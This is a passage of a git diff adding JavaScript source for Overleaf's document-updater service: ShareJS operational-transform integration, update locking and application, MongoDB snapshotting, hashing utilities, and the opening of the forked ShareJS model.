+  150, 200, 300, 400,
+]
+
+module.exports = ShareJsDB = class ShareJsDB {
+  constructor(projectId, docId, lines, version) {
+    this.project_id = projectId
+    this.doc_id = docId
+    this.lines = lines
+    this.version = version
+    this.appliedOps = {}
+    // ShareJS calls this detached from the instance, so we need to
+    // bind it to keep our context that can access @appliedOps
+    this.writeOp = this._writeOp.bind(this)
+    this.startTimeShareJsDB = performance.now()
+  }
+
+  getOps(docKey, start, end, callback) {
+    if (start === end || (start === this.version && end === null)) {
+      const status = 'is-up-to-date'
+      Metrics.inc('transform-updates', 1, {
+        status,
+        path: 'sharejs',
+      })
+      Metrics.histogram(
+        'transform-updates.count',
+        0,
+        TRANSFORM_UPDATES_COUNT_BUCKETS,
+        { path: 'sharejs', status }
+      )
+      return callback(null, [])
+    }
+
+    // In redis, lrange values are inclusive.
+    if (end != null) {
+      end--
+    } else {
+      end = -1
+    }
+
+    const [projectId, docId] = Array.from(Keys.splitProjectIdAndDocId(docKey))
+    const timer = new Metrics.Timer(
+      'transform-updates.timing',
+      1,
+      { path: 'sharejs' },
+      [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10, 20, 50, 100, 200, 500, 1000]
+    )
+    RedisManager.getPreviousDocOps(docId, start, end, (err, ops) => {
+      let status
+      if (err) {
+        if (err instanceof Errors.OpRangeNotAvailableError) {
+          status = 'out-of-range'
+        } else {
+          status = 'error'
+        }
+      } else {
+        if (ops.length === 0) {
+          status = 'fetched-zero'
+
+          // The sharejs processing is happening under a lock.
+          // In case there are no other ops available, something bypassed the lock (or we overran it).
+          logger.warn(
+            {
+              projectId,
+              docId,
+              start,
+              end,
+              timeSinceShareJsDBInit:
+                performance.now() - this.startTimeShareJsDB,
+            },
+            'found zero docOps while transforming update'
+          )
+        } else {
+          status = 'fetched'
+        }
+        Metrics.histogram(
+          'transform-updates.count',
+          ops.length,
+          TRANSFORM_UPDATES_COUNT_BUCKETS,
+          { path: 'sharejs', status }
+        )
+      }
+
+      timer.done({ status })
+      Metrics.inc('transform-updates', 1, { status, path: 'sharejs' })
+      callback(err, ops)
+    })
+  }
+
+  _writeOp(docKey, opData, callback) {
+    if (this.appliedOps[docKey] == null) {
+      this.appliedOps[docKey] = []
+    }
+    this.appliedOps[docKey].push(opData)
+    return callback()
+  }
+
+  getSnapshot(docKey, callback) {
+    if (
+      docKey !== Keys.combineProjectIdAndDocId(this.project_id, this.doc_id)
+    ) {
+      return callback(
+        new Errors.NotFoundError(
+          `unexpected doc_key ${docKey}, expected ${Keys.combineProjectIdAndDocId(
+            this.project_id,
+            this.doc_id
+          )}`
+        )
+      )
+    } else {
+      return callback(null, {
+        snapshot: this.lines.join('\n'),
+        v: parseInt(this.version, 10),
+        type: 'text',
+      })
+    }
+  }
+
+  // To be able to remove a doc from the ShareJS memory
+  // we need to call Model::delete, which calls this
+  // method on the database.
However, we will handle removing + // it from Redis ourselves + delete(docName, dbMeta, callback) { + return callback() + } +} diff --git a/services/document-updater/app/js/ShareJsUpdateManager.js b/services/document-updater/app/js/ShareJsUpdateManager.js new file mode 100644 index 0000000..933ded1 --- /dev/null +++ b/services/document-updater/app/js/ShareJsUpdateManager.js @@ -0,0 +1,158 @@ +/* eslint-disable + no-unused-vars, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const ShareJsModel = require('./sharejs/server/model') +const ShareJsDB = require('./ShareJsDB') +const logger = require('@overleaf/logger') +const Settings = require('@overleaf/settings') +const { promisifyAll } = require('@overleaf/promise-utils') +const Keys = require('./UpdateKeys') +const { EventEmitter } = require('node:events') +const util = require('node:util') +const RealTimeRedisManager = require('./RealTimeRedisManager') +const crypto = require('node:crypto') +const metrics = require('./Metrics') +const Errors = require('./Errors') + +ShareJsModel.prototype = {} +util.inherits(ShareJsModel, EventEmitter) + +const MAX_AGE_OF_OP = 80 + +const ShareJsUpdateManager = { + getNewShareJsModel(projectId, docId, lines, version) { + const db = new ShareJsDB(projectId, docId, lines, version) + const model = new ShareJsModel(db, { + maxDocLength: Settings.max_doc_length, + maximumAge: MAX_AGE_OF_OP, + }) + model.db = db + return model + }, + + applyUpdate(projectId, docId, update, lines, version, callback) { + if (callback == null) { + callback = function () {} + } + logger.debug({ projectId, docId, update }, 'applying sharejs updates') + const jobs = [] + // record the update version before it is modified + const incomingUpdateVersion = update.v + // We could use a global model for all docs, but we're hitting issues with the + // internal state of ShareJS not being accessible for clearing caches, and + // getting stuck due to queued callbacks (line 260 of sharejs/server/model.coffee) + // This adds a small but hopefully acceptable overhead (~12ms per 1000 updates on + // my 2009 MBP). 
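+    // For reference (shape assumed from usage elsewhere in this service): a
+    // text update looks roughly like
+    //   { v: 42, op: [{ i: 'foo', p: 4 }, { d: 'bar', p: 8 }], meta: {...} }
+    // where `i` inserts at position `p`, `d` deletes, and `v` is the doc
+    // version the op was composed against.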
+ const model = this.getNewShareJsModel(projectId, docId, lines, version) + this._listenForOps(model) + const docKey = Keys.combineProjectIdAndDocId(projectId, docId) + return model.applyOp(docKey, update, function (error) { + if (error != null) { + if (error === 'Op already submitted') { + metrics.inc('sharejs.already-submitted') + logger.debug( + { projectId, docId, update }, + 'op has already been submitted' + ) + update.dup = true + ShareJsUpdateManager._sendOp(projectId, docId, update) + } else if (/^Delete component/.test(error)) { + metrics.inc('sharejs.delete-mismatch') + logger.debug( + { projectId, docId, update, shareJsErr: error }, + 'sharejs delete does not match' + ) + error = new Errors.DeleteMismatchError( + 'Delete component does not match' + ) + return callback(error) + } else { + metrics.inc('sharejs.other-error') + return callback(error) + } + } + logger.debug({ projectId, docId, error }, 'applied update') + return model.getSnapshot(docKey, (error, data) => { + if (error != null) { + return callback(error) + } + const docSizeAfter = data.snapshot.length + if (docSizeAfter > Settings.max_doc_length) { + const docSizeBefore = lines.join('\n').length + const err = new Error( + 'blocking persistence of ShareJs update: doc size exceeds limits' + ) + logger.error( + { projectId, docId, err, docSizeBefore, docSizeAfter }, + err.message + ) + metrics.inc('sharejs.other-error') + const publicError = 'Update takes doc over max doc size' + return callback(publicError) + } + // only check hash when present and no other updates have been applied + if (update.hash != null && incomingUpdateVersion === version) { + const ourHash = ShareJsUpdateManager._computeHash(data.snapshot) + if (ourHash !== update.hash) { + metrics.inc('sharejs.hash-fail') + return callback(new Error('Invalid hash')) + } else { + metrics.inc('sharejs.hash-pass', 0.001) + } + } + const docLines = data.snapshot.split(/\r\n|\n|\r/) + return callback( + null, + docLines, + data.v, + model.db.appliedOps[docKey] || [] + ) + }) + }) + }, + + _listenForOps(model) { + return model.on('applyOp', function (docKey, opData) { + const [projectId, docId] = Array.from(Keys.splitProjectIdAndDocId(docKey)) + return ShareJsUpdateManager._sendOp(projectId, docId, opData) + }) + }, + + _sendOp(projectId, docId, op) { + RealTimeRedisManager.sendData({ + project_id: projectId, + doc_id: docId, + op, + }) + RealTimeRedisManager.sendCanaryAppliedOp({ + projectId, + docId, + op, + }) + }, + + _computeHash(content) { + return crypto + .createHash('sha1') + .update('blob ' + content.length + '\x00') + .update(content, 'utf8') + .digest('hex') + }, +} + +module.exports = ShareJsUpdateManager +module.exports.promises = promisifyAll(ShareJsUpdateManager, { + without: ['getNewShareJsModel', '_listenForOps', '_sendOp', '_computeHash'], + multiResult: { + applyUpdate: ['updatedDocLines', 'version', 'appliedOps'], + }, +}) diff --git a/services/document-updater/app/js/SnapshotManager.js b/services/document-updater/app/js/SnapshotManager.js new file mode 100644 index 0000000..c207e73 --- /dev/null +++ b/services/document-updater/app/js/SnapshotManager.js @@ -0,0 +1,83 @@ +/* eslint-disable + no-return-assign, +*/ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. 
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+const { promisifyAll } = require('@overleaf/promise-utils')
+const { db, ObjectId } = require('./mongodb')
+
+const SnapshotManager = {
+  recordSnapshot(projectId, docId, version, pathname, lines, ranges, callback) {
+    try {
+      projectId = new ObjectId(projectId)
+      docId = new ObjectId(docId)
+    } catch (error) {
+      return callback(error)
+    }
+    db.docSnapshots.insertOne(
+      {
+        project_id: projectId,
+        doc_id: docId,
+        version,
+        lines,
+        pathname,
+        ranges: SnapshotManager.jsonRangesToMongo(ranges),
+        ts: new Date(),
+      },
+      callback
+    )
+  },
+  // Suggested indexes:
+  //   db.docSnapshots.createIndex({ts:1},{expireAfterSeconds: 30*24*3600}) # expires after 30 days
+  //   db.docSnapshots.createIndex({project_id:1, doc_id:1})
+
+  jsonRangesToMongo(ranges) {
+    if (ranges == null) {
+      return null
+    }
+
+    const updateMetadata = function (metadata) {
+      if ((metadata != null ? metadata.ts : undefined) != null) {
+        metadata.ts = new Date(metadata.ts)
+      }
+      if ((metadata != null ? metadata.user_id : undefined) != null) {
+        return (metadata.user_id = SnapshotManager._safeObjectId(
+          metadata.user_id
+        ))
+      }
+    }
+
+    for (const change of Array.from(ranges.changes || [])) {
+      change.id = SnapshotManager._safeObjectId(change.id)
+      updateMetadata(change.metadata)
+    }
+    for (const comment of Array.from(ranges.comments || [])) {
+      comment.id = SnapshotManager._safeObjectId(comment.id)
+      if ((comment.op != null ? comment.op.t : undefined) != null) {
+        comment.op.t = SnapshotManager._safeObjectId(comment.op.t)
+      }
+      updateMetadata(comment.metadata)
+    }
+    return ranges
+  },
+
+  _safeObjectId(data) {
+    try {
+      return new ObjectId(data)
+    } catch (error) {
+      return data
+    }
+  },
+}
+
+module.exports = SnapshotManager
+module.exports.promises = promisifyAll(SnapshotManager, {
+  without: ['jsonRangesToMongo', '_safeObjectId'],
+})
diff --git a/services/document-updater/app/js/UpdateKeys.js b/services/document-updater/app/js/UpdateKeys.js
new file mode 100644
index 0000000..3c03dd1
--- /dev/null
+++ b/services/document-updater/app/js/UpdateKeys.js
@@ -0,0 +1,10 @@
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
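+// Example (illustrative, not part of the original source):
+//   combineProjectIdAndDocId('p1', 'd1')  -> 'p1:d1'
+//   splitProjectIdAndDocId('p1:d1')       -> ['p1', 'd1']
+// The round trip relies on ids never containing ':' (Mongo ObjectIds are
+// hex strings, so this holds in practice).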
+module.exports = { + combineProjectIdAndDocId(projectId, docId) { + return `${projectId}:${docId}` + }, + splitProjectIdAndDocId(projectAndDocId) { + return projectAndDocId.split(':') + }, +} diff --git a/services/document-updater/app/js/UpdateManager.js b/services/document-updater/app/js/UpdateManager.js new file mode 100644 index 0000000..1f58a75 --- /dev/null +++ b/services/document-updater/app/js/UpdateManager.js @@ -0,0 +1,378 @@ +// @ts-check + +const { callbackifyAll } = require('@overleaf/promise-utils') +const LockManager = require('./LockManager') +const RedisManager = require('./RedisManager') +const ProjectHistoryRedisManager = require('./ProjectHistoryRedisManager') +const RealTimeRedisManager = require('./RealTimeRedisManager') +const ShareJsUpdateManager = require('./ShareJsUpdateManager') +const HistoryManager = require('./HistoryManager') +const logger = require('@overleaf/logger') +const Metrics = require('./Metrics') +const Errors = require('./Errors') +const DocumentManager = require('./DocumentManager') +const RangesManager = require('./RangesManager') +const SnapshotManager = require('./SnapshotManager') +const Profiler = require('./Profiler') +const { isInsert, isDelete, getDocLength, computeDocHash } = require('./Utils') + +/** + * @import { DeleteOp, InsertOp, Op, Ranges, Update, HistoryUpdate } from "./types" + */ + +const UpdateManager = { + async processOutstandingUpdates(projectId, docId) { + const timer = new Metrics.Timer('updateManager.processOutstandingUpdates') + try { + await UpdateManager.fetchAndApplyUpdates(projectId, docId) + timer.done({ status: 'success' }) + } catch (err) { + timer.done({ status: 'error' }) + throw err + } + }, + + async processOutstandingUpdatesWithLock(projectId, docId) { + const profile = new Profiler('processOutstandingUpdatesWithLock', { + project_id: projectId, + doc_id: docId, + }) + + const lockValue = await LockManager.promises.tryLock(docId) + if (lockValue == null) { + return + } + profile.log('tryLock') + + try { + await UpdateManager.processOutstandingUpdates(projectId, docId) + profile.log('processOutstandingUpdates') + } finally { + await LockManager.promises.releaseLock(docId, lockValue) + profile.log('releaseLock').end() + } + + await UpdateManager.continueProcessingUpdatesWithLock(projectId, docId) + }, + + async continueProcessingUpdatesWithLock(projectId, docId) { + const length = await RealTimeRedisManager.promises.getUpdatesLength(docId) + if (length > 0) { + await UpdateManager.processOutstandingUpdatesWithLock(projectId, docId) + } + }, + + async fetchAndApplyUpdates(projectId, docId) { + const profile = new Profiler('fetchAndApplyUpdates', { + project_id: projectId, + doc_id: docId, + }) + + const updates = + await RealTimeRedisManager.promises.getPendingUpdatesForDoc(docId) + logger.debug( + { projectId, docId, count: updates.length }, + 'processing updates' + ) + if (updates.length === 0) { + return + } + profile.log('getPendingUpdatesForDoc') + + for (const update of updates) { + await UpdateManager.applyUpdate(projectId, docId, update) + profile.log('applyUpdate') + } + profile.log('async done').end() + }, + + /** + * Apply an update to the given document + * + * @param {string} projectId + * @param {string} docId + * @param {Update} update + */ + async applyUpdate(projectId, docId, update) { + const profile = new Profiler('applyUpdate', { + project_id: projectId, + doc_id: docId, + }) + + UpdateManager._sanitizeUpdate(update) + profile.log('sanitizeUpdate', { sync: true }) + + try { + let { + lines, + 
version, + ranges, + pathname, + projectHistoryId, + historyRangesSupport, + } = await DocumentManager.promises.getDoc(projectId, docId) + profile.log('getDoc') + + if (lines == null || version == null) { + throw new Errors.NotFoundError(`document not found: ${docId}`) + } + + const previousVersion = version + const incomingUpdateVersion = update.v + let updatedDocLines, appliedOps + ;({ updatedDocLines, version, appliedOps } = + await ShareJsUpdateManager.promises.applyUpdate( + projectId, + docId, + update, + lines, + version + )) + profile.log('sharejs.applyUpdate', { + // only synchronous when the update applies directly to the + // doc version, otherwise getPreviousDocOps is called. + sync: incomingUpdateVersion === previousVersion, + }) + + const { newRanges, rangesWereCollapsed, historyUpdates } = + RangesManager.applyUpdate( + projectId, + docId, + ranges, + appliedOps, + updatedDocLines, + { historyRangesSupport } + ) + profile.log('RangesManager.applyUpdate', { sync: true }) + + await RedisManager.promises.updateDocument( + projectId, + docId, + updatedDocLines, + version, + appliedOps, + newRanges, + update.meta + ) + profile.log('RedisManager.updateDocument') + + UpdateManager._adjustHistoryUpdatesMetadata( + historyUpdates, + pathname, + projectHistoryId, + lines, + ranges, + updatedDocLines, + historyRangesSupport + ) + + if (historyUpdates.length > 0) { + Metrics.inc('history-queue', 1, { status: 'project-history' }) + try { + const projectOpsLength = + await ProjectHistoryRedisManager.promises.queueOps( + projectId, + ...historyUpdates.map(op => JSON.stringify(op)) + ) + HistoryManager.recordAndFlushHistoryOps( + projectId, + historyUpdates, + projectOpsLength + ) + profile.log('recordAndFlushHistoryOps') + } catch (err) { + // The full project history can re-sync a project in case + // updates went missing. + // Just record the error here and acknowledge the write-op. + Metrics.inc('history-queue-error') + } + } + + if (rangesWereCollapsed) { + Metrics.inc('doc-snapshot') + logger.debug( + { + projectId, + docId, + previousVersion, + lines, + ranges, + update, + }, + 'update collapsed some ranges, snapshotting previous content' + ) + + // Do this last, since it's a mongo call, and so potentially longest running + // If it overruns the lock, it's ok, since all of our redis work is done + await SnapshotManager.promises.recordSnapshot( + projectId, + docId, + previousVersion, + pathname, + lines, + ranges + ) + } + } catch (error) { + RealTimeRedisManager.sendData({ + project_id: projectId, + doc_id: docId, + error: error instanceof Error ? error.message : error, + }) + profile.log('sendData') + throw error + } finally { + profile.end() + } + }, + + async lockUpdatesAndDo(method, projectId, docId, ...args) { + const profile = new Profiler('lockUpdatesAndDo', { + project_id: projectId, + doc_id: docId, + }) + + const lockValue = await LockManager.promises.getLock(docId) + profile.log('getLock') + + let result + try { + await UpdateManager.processOutstandingUpdates(projectId, docId) + profile.log('processOutstandingUpdates') + + result = await method(projectId, docId, ...args) + profile.log('method') + } finally { + await LockManager.promises.releaseLock(docId, lockValue) + profile.log('releaseLock').end() + } + + // We held the lock for a while so updates might have queued up + UpdateManager.continueProcessingUpdatesWithLock(projectId, docId).catch( + err => { + // The processing may fail for invalid user updates. 
+ // This can be very noisy, put them on level DEBUG + // and record a metric. + Metrics.inc('background-processing-updates-error') + logger.debug( + { err, projectId, docId }, + 'error processing updates in background' + ) + } + ) + + return result + }, + + _sanitizeUpdate(update) { + // In Javascript, characters are 16-bits wide. It does not understand surrogates as characters. + // + // From Wikipedia (http://en.wikipedia.org/wiki/Plane_(Unicode)#Basic_Multilingual_Plane): + // "The High Surrogates (U+D800–U+DBFF) and Low Surrogate (U+DC00–U+DFFF) codes are reserved + // for encoding non-BMP characters in UTF-16 by using a pair of 16-bit codes: one High Surrogate + // and one Low Surrogate. A single surrogate code point will never be assigned a character."" + // + // The main offender seems to be \uD835 as a stand alone character, which would be the first + // 16-bit character of a blackboard bold character (http://www.fileformat.info/info/unicode/char/1d400/index.htm). + // Something must be going on client side that is screwing up the encoding and splitting the + // two 16-bit characters so that \uD835 is standalone. + for (const op of update.op || []) { + if (op.i != null) { + // Replace high and low surrogate characters with 'replacement character' (\uFFFD) + op.i = op.i.replace(/[\uD800-\uDFFF]/g, '\uFFFD') + } + } + return update + }, + + /** + * Add metadata that will be useful to project history + * + * @param {HistoryUpdate[]} updates + * @param {string} pathname + * @param {string} projectHistoryId + * @param {string[]} lines - document lines before updates were applied + * @param {Ranges} ranges - ranges before updates were applied + * @param {string[]} newLines - document lines after updates were applied + * @param {boolean} historyRangesSupport + */ + _adjustHistoryUpdatesMetadata( + updates, + pathname, + projectHistoryId, + lines, + ranges, + newLines, + historyRangesSupport + ) { + let docLength = getDocLength(lines) + let historyDocLength = docLength + for (const change of ranges.changes ?? []) { + if ('d' in change.op) { + historyDocLength += change.op.d.length + } + } + + for (const update of updates) { + update.projectHistoryId = projectHistoryId + if (!update.meta) { + update.meta = {} + } + update.meta.pathname = pathname + update.meta.doc_length = docLength + if (historyRangesSupport && historyDocLength !== docLength) { + update.meta.history_doc_length = historyDocLength + } + + // Each update may contain multiple ops, i.e. + // [{ + // ops: [{i: "foo", p: 4}, {d: "bar", p:8}] + // }, { + // ops: [{d: "baz", p: 40}, {i: "qux", p:8}] + // }] + // We want to include the doc_length at the start of each update, + // before it's ops are applied. However, we need to track any + // changes to it for the next update. + for (const op of update.op) { + if (isInsert(op)) { + docLength += op.i.length + if (!op.trackedDeleteRejection) { + // Tracked delete rejections end up retaining characters rather + // than inserting + historyDocLength += op.i.length + } + } + if (isDelete(op)) { + docLength -= op.d.length + if (update.meta.tc) { + // This is a tracked delete. It will be translated into a retain in + // history, except any enclosed tracked inserts, which will be + // translated into regular deletes. + for (const change of op.trackedChanges ?? []) { + if (change.type === 'insert') { + historyDocLength -= change.length + } + } + } else { + // This is a regular delete. It will be translated to a delete in + // history. 
+ historyDocLength -= op.d.length + } + } + } + + if (!historyRangesSupport) { + // Prevent project-history from processing tracked changes + delete update.meta.tc + } + } + + if (historyRangesSupport && updates.length > 0) { + const lastUpdate = updates[updates.length - 1] + lastUpdate.meta ??= {} + lastUpdate.meta.doc_hash = computeDocHash(newLines) + } + }, +} + +module.exports = { ...callbackifyAll(UpdateManager), promises: UpdateManager } diff --git a/services/document-updater/app/js/Utils.js b/services/document-updater/app/js/Utils.js new file mode 100644 index 0000000..a632cf3 --- /dev/null +++ b/services/document-updater/app/js/Utils.js @@ -0,0 +1,129 @@ +// @ts-check +const { createHash } = require('node:crypto') +const _ = require('lodash') + +/** + * @import { CommentOp, DeleteOp, InsertOp, Op, TrackedChange } from './types' + */ + +/** + * Returns true if the op is an insert + * + * @param {Op} op + * @returns {op is InsertOp} + */ +function isInsert(op) { + return 'i' in op && op.i != null +} + +/** + * Returns true if the op is an insert + * + * @param {Op} op + * @returns {op is DeleteOp} + */ +function isDelete(op) { + return 'd' in op && op.d != null +} + +/** + * Returns true if the op is a comment + * + * @param {Op} op + * @returns {op is CommentOp} + */ +function isComment(op) { + return 'c' in op && op.c != null +} + +/** + * Get the length of a document from its lines + * + * @param {string[]} lines + * @returns {number} + */ +function getDocLength(lines) { + let docLength = _.reduce(lines, (chars, line) => chars + line.length, 0) + // Add newline characters. Lines are joined by newlines, but the last line + // doesn't include a newline. We must make a special case for an empty list + // so that it doesn't report a doc length of -1. + docLength += Math.max(lines.length - 1, 0) + + return docLength +} + +/** + * Adds given tracked deletes to the given content. + * + * The history system includes tracked deletes in the document content. + * + * @param {string} content + * @param {TrackedChange[]} trackedChanges + * @return {string} content for the history service + */ +function addTrackedDeletesToContent(content, trackedChanges) { + let cursor = 0 + let result = '' + for (const change of trackedChanges) { + if (isDelete(change.op)) { + // Add the content before the tracked delete + result += content.slice(cursor, change.op.p) + cursor = change.op.p + // Add the content of the tracked delete + result += change.op.d + } + } + + // Add the content after all tracked deletes + result += content.slice(cursor) + + return result +} + +/** + * Compute the content hash for a doc + * + * This hash is sent to the history to validate updates. 
+ * + * @param {string[]} lines + * @return {string} the doc hash + */ +function computeDocHash(lines) { + const hash = createHash('sha1') + if (lines.length > 0) { + for (const line of lines.slice(0, lines.length - 1)) { + hash.update(line) + hash.update('\n') + } + // The last line doesn't end with a newline + hash.update(lines[lines.length - 1]) + } + return hash.digest('hex') +} + +/** + * checks if the given originOrSource should be treated as a source or origin + * TODO: remove this hack and remove all "source" references + */ +function extractOriginOrSource(originOrSource) { + let source = null + let origin = null + + if (typeof originOrSource === 'string') { + source = originOrSource + } else if (originOrSource && typeof originOrSource === 'object') { + origin = originOrSource + } + + return { source, origin } +} + +module.exports = { + isInsert, + isDelete, + isComment, + addTrackedDeletesToContent, + getDocLength, + computeDocHash, + extractOriginOrSource, +} diff --git a/services/document-updater/app/js/mongodb.js b/services/document-updater/app/js/mongodb.js new file mode 100644 index 0000000..6e38993 --- /dev/null +++ b/services/document-updater/app/js/mongodb.js @@ -0,0 +1,28 @@ +const Metrics = require('@overleaf/metrics') +const Settings = require('@overleaf/settings') +const { MongoClient, ObjectId } = require('mongodb-legacy') + +const mongoClient = new MongoClient(Settings.mongo.url, Settings.mongo.options) +const mongoDb = mongoClient.db() + +const db = { + docs: mongoDb.collection('docs'), + docSnapshots: mongoDb.collection('docSnapshots'), + projects: mongoDb.collection('projects'), +} + +async function healthCheck() { + const res = await mongoDb.command({ ping: 1 }) + if (!res.ok) { + throw new Error('failed mongo ping') + } +} + +Metrics.mongodb.monitor(mongoClient) + +module.exports = { + db, + ObjectId, + mongoClient, + healthCheck: require('node:util').callbackify(healthCheck), +} diff --git a/services/document-updater/app/js/sharejs/LICENSE b/services/document-updater/app/js/sharejs/LICENSE new file mode 100644 index 0000000..3e6b73e --- /dev/null +++ b/services/document-updater/app/js/sharejs/LICENSE @@ -0,0 +1,22 @@ +Licensed under the standard MIT license: + +Copyright 2011 Joseph Gentle. +Copyright 2012-2024 Overleaf. + +Permission is hereby granted, free of charge, to any person obtaining a copy +of this software and associated documentation files (the "Software"), to deal +in the Software without restriction, including without limitation the rights +to use, copy, modify, merge, publish, distribute, sublicense, and/or sell +copies of the Software, and to permit persons to whom the Software is +furnished to do so, subject to the following conditions: + +The above copyright notice and this permission notice shall be included in +all copies or substantial portions of the Software. + +THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR +IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, +FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE +AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER +LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, +OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN +THE SOFTWARE. 
diff --git a/services/document-updater/app/js/sharejs/README.md b/services/document-updater/app/js/sharejs/README.md
new file mode 100644
index 0000000..f5919dd
--- /dev/null
+++ b/services/document-updater/app/js/sharejs/README.md
@@ -0,0 +1,6 @@
+This folder contains a modified version of the ShareJS source code, forked from [v0.5.0](https://github.com/josephg/ShareJS/tree/v0.5.0/).
+
+The original CoffeeScript code has been decaffeinated to JavaScript, and further modified. Some folders have been removed. See https://github.com/josephg/ShareJS/blob/v0.5.0/src/types/README.md for the original README.
+
+The original code, and the current modified code in this directory, are published under the MIT license.
+
diff --git a/services/document-updater/app/js/sharejs/server/model.js b/services/document-updater/app/js/sharejs/server/model.js
new file mode 100644
index 0000000..a646b22
--- /dev/null
+++ b/services/document-updater/app/js/sharejs/server/model.js
@@ -0,0 +1,895 @@
+/* eslint-disable
+  no-console,
+  no-return-assign,
+  n/no-callback-literal,
+*/
+// TODO: This file was created by bulk-decaffeinate.
+// Fix any style issues and re-enable lint.
+/*
+ * decaffeinate suggestions:
+ * DS101: Remove unnecessary use of Array.from
+ * DS102: Remove unnecessary code created because of implicit returns
+ * DS103: Rewrite code to no longer use __guard__
+ * DS104: Avoid inline assignments
+ * DS204: Change includes calls to have a more natural evaluation order
+ * DS205: Consider reworking code to avoid use of IIFEs
+ * DS207: Consider shorter variations of null checks
+ * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md
+ */
+// The model of all the ops. Responsible for applying & transforming remote deltas
+// and managing the storage layer.
+//
+// Actual storage is handled by the database wrappers in db/*, wrapped by DocCache
+
+let Model
+const { EventEmitter } = require('node:events')
+
+const queue = require('./syncqueue')
+const types = require('../types')
+
+const Profiler = require('../../Profiler')
+
+const isArray = o => Object.prototype.toString.call(o) === '[object Array]'
+
+// This constructor creates a new Model object. There will be one model object
+// per server context.
+//
+// The model object is responsible for a lot of things:
+//
+// - It manages the interactions with the database
+// - It maintains (in memory) a set of all active documents
+// - It calls out to the OT functions when necessary
+//
+// The model is an event emitter. It emits the following events:
+//
+// create(docName, data): A document has been created with the specified name & data
+module.exports = Model = function (db, options) {
+  // db can be null if the user doesn't want persistence.
+
+  let getOps
+  if (!(this instanceof Model)) {
+    return new Model(db, options)
+  }
+
+  const model = this
+
+  if (options == null) {
+    options = {}
+  }
+
+  // This is a cache of 'live' documents.
+  //
+  // The cache is a map from docName -> {
+  //   ops: [{op, meta}]
+  //   snapshot
+  //   type
+  //   v
+  //   meta
+  //   eventEmitter
+  //   reapTimer
+  //   committedVersion: v
+  //   snapshotWriteLock: bool to make sure writeSnapshot isn't re-entrant
+  //   dbMeta: database specific data
+  //   opQueue: syncQueue for processing ops
+  // }
+  //
+  // The ops list contains the document's last options.numCachedOps ops. (Or all
+  // of them if we're using a memory store).
+ // + // Documents are stored in this set so long as the document has been accessed in + // the last few seconds (options.reapTime) OR at least one client has the document + // open. I don't know if I should keep open (but not being edited) documents live - + // maybe if a client has a document open but the document isn't being edited, I should + // flush it from the cache. + // + // In any case, the API to model is designed such that if we want to change that later + // it should be pretty easy to do so without any external-to-the-model code changes. + const docs = {} + + // This is a map from docName -> [callback]. It is used when a document hasn't been + // cached and multiple getSnapshot() / getVersion() requests come in. All requests + // are added to the callback list and called when db.getSnapshot() returns. + // + // callback(error, snapshot data) + const awaitingGetSnapshot = {} + + // The time that documents which no clients have open will stay in the cache. + // Should be > 0. + if (options.reapTime == null) { + options.reapTime = 3000 + } + + // The number of operations the cache holds before reusing the space + if (options.numCachedOps == null) { + options.numCachedOps = 10 + } + + // This option forces documents to be reaped, even when there's no database backend. + // This is useful when you don't care about persistance and don't want to gradually + // fill memory. + // + // You might want to set reapTime to a day or something. + if (options.forceReaping == null) { + options.forceReaping = false + } + + // Until I come up with a better strategy, we'll save a copy of the document snapshot + // to the database every ~20 submitted ops. + if (options.opsBeforeCommit == null) { + options.opsBeforeCommit = 20 + } + + // It takes some processing time to transform client ops. The server will punt ops back to the + // client to transform if they're too old. + if (options.maximumAge == null) { + options.maximumAge = 40 + } + + // **** Cache API methods + + // Its important that all ops are applied in order. This helper method creates the op submission queue + // for a single document. This contains the logic for transforming & applying ops. + const makeOpQueue = (docName, doc) => + queue(function (opData, callback) { + if (!(opData.v >= 0)) { + return callback('Version missing') + } + if (opData.v > doc.v) { + return callback('Op at future version') + } + + // Punt the transforming work back to the client if the op is too old. + if (opData.v + options.maximumAge < doc.v) { + return callback('Op too old') + } + + if (!opData.meta) { + opData.meta = {} + } + opData.meta.ts = Date.now() + + // We'll need to transform the op to the current version of the document. This + // calls the callback immediately if opVersion == doc.v. + return getOps(docName, opData.v, doc.v, function (error, ops) { + let snapshot + if (error) { + return callback(error) + } + + if (doc.v - opData.v !== ops.length) { + // This should never happen. It indicates that we didn't get all the ops we + // asked for. Its important that the submitted op is correctly transformed. + console.error( + `Could not get old ops in model for document ${docName}` + ) + console.error( + `Expected ops ${opData.v} to ${doc.v} and got ${ops.length} ops` + ) + return callback('Internal error') + } + + if (ops.length > 0) { + try { + const profile = new Profiler('model.transform') + // If there's enough ops, it might be worth spinning this out into a webworker thread. 
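+          // Worked example of the transform below (assumed text-type
+          // semantics, for illustration): if the submitted op inserts at
+          // position 5 but a concurrent, already-committed op inserted 3
+          // characters at position 0, transforming with side 'left' shifts
+          // the submitted op to position 8; opData.v is bumped once per
+          // transformed op.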
